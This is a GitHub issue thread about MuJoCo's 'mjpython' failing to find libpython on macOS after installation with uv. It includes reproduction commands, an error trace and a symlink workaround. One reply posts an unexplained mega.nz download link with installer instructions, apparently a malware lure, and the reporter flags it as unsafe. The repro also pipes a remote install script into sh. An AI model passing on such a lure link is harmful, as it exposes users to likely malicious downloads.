google-deepmind/mujoco #1923: `mjpython` bug when installed with `uv` package manager

jonzamora, 2024-08-25:
Hi,

When i try to run a MuJoCo script with `mjpython` on my Macbook after installing `mujoco` with the [`uv` package manager](https://github.com/astral-sh/uv), I get an error message. To reproduce the error, I ran the following commands:

```bash
# On macOS and Linux.
$ curl -LsSf https://astral.sh/uv/install.sh | sh

# Create project and run mjpython
uv init mujoco-example
cd mujoco-example
uv add mujoco
source .venv/bin/activate
mjpython
```

The error says the following:

```
(.venv) jonzamora@mbp mujoco-example % mjpython
failed to dlopen path '/Users/jonzamora/Research/mujoco-example/.venv/bin/python': dlopen(/Users/jonzamora/Research/mujoco-example/.venv/bin/python, 0x000A): Library not loaded: @executable_path/../lib/libpython3.10.dylib
  Referenced from: <4C4C44EE-5555-3144-A1A0-28739E256A39> /Users/jonzamora/.local/share/uv/python/cpython-3.10.14-macos-aarch64-none/bin/python3.10
  Reason: tried: '/Users/jonzamora/Research/mujoco-example/.venv/lib/python3.10/site-packages/mujoco/MuJoCo (mjpython).app/Contents/lib/libpython3.10.dylib' (no such file), '/Users/jonzamora/Research/mujoco-example/.venv/bin/../lib/libpython3.10.dylib' (no such file), '/libpython3.10.dylib' (no such file)
```

Of course, you could run `mjpython main.py`, where `main.py` is a passive viewer rendering script like this:

```python
import time

import mujoco
import mujoco.viewer

m = mujoco.MjModel.from_xml_path('/path/to/mjcf.xml')
d = mujoco.MjData(m)

with mujoco.viewer.launch_passive(m, d) as viewer:
  # Close the viewer automatically after 30 wall-seconds.
  start = time.time()
  while viewer.is_running() and time.time() - start < 30:
    step_start = time.time()

    # mj_step can be replaced with code that also evaluates
    # a policy and applies a control signal before stepping the physics.
    mujoco.mj_step(m, d)

    # Example modification of a viewer option: toggle contact points every two seconds.
    with viewer.lock():
      viewer.opt.flags[mujoco.mjtVisFlag.mjVIS_CONTACTPOINT] = int(d.time % 2)

    # Pick up changes to the physics state, apply perturbations, update options from GUI.
    viewer.sync()

    # Rudimentary time keeping, will drift relative to wall clock.
    time_until_next_step = m.opt.timestep - (time.time() - step_start)
    if time_until_next_step > 0:
      time.sleep(time_until_next_step)
```

Any help will be greatly appreciated, i'm sure others are also hoping to use a combination of `mujoco` and `uv` on their Macbook machines. Thanks!

**My Setup**
  - Operating system + Machine
    - macOS Sonoma, M3 Max Macbook Pro
  - MuJoCo version (and if the bug is new, the version where it used to work)
    - MuJoCo 3.2.2
  - For Python issues, what bindings are you using (i.e `mujoco`, `dm_control`, `mujoco-py`)?
    - `mujoco`

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

jonzamora, 2024-08-25:
I'm going to wait for a MuJoCo-affiliated developer to respond, i don't think the link above is safe to click 😅

saran-t, 2024-10-18:
I'm not familiar with `uv` but it seems that for whatever reason [this section of code](https://github.com/google-deepmind/mujoco/blob/main/python/mujoco/mjpython/mjpython.py#L56) isn't working properly.

Would you be able to run [`get_executable_path()`](https://github.com/google-deepmind/mujoco/blob/main/python/mujoco/mjpython/mjpython.py#L38) from mjpython.py from your non-working venv and tell me what you get?

hello-robot-shehab, 2025-03-25:
Here is a quick hack for this problem:

```shell
  PYTHON_LIB_DIR=$(python3 -c 'from distutils.sysconfig import get_config_var; print(get_config_var("LIBDIR"))')
  PYTHON_LIB_NAME=$(python3 -c 'from distutils.sysconfig import get_config_var; print(get_config_var("LDLIBRARY"))')
  ln -s "$PYTHON_LIB_DIR/$PYTHON_LIB_NAME" ./.venv/lib/$PYTHON_LIB_NAME
```

closed 2025-04-05 by jonzamora

yunho-c, 2025-08-02:
Can confirm the issue persists (`uv==0.8.4`, `python==3.12.10`, `mujoco=3.3.4`). 

Here is the same command from shehab modified for `fish` shell:

```
# Find the path to LIBDIR and LDLIBRARY (dylib file) on your system:
set PYTHON_LIB_DIR (python3 -c 'from distutils.sysconfig import get_config_var; print(get_config_var("LIBDIR"))')
set PYTHON_LIB_NAME (python3 -c 'from distutils.sysconfig import get_config_var; print(get_config_var("LDLIBRARY"))')

# Soft link it inside your virtual environment:
ln -s "$PYTHON_LIB_DIR/$PYTHON_LIB_NAME" ./.venv/lib/$PYTHON_LIB_NAME
```

XiaoPengYouCode, 2026-03-25:
This issue is still reproducible on macOS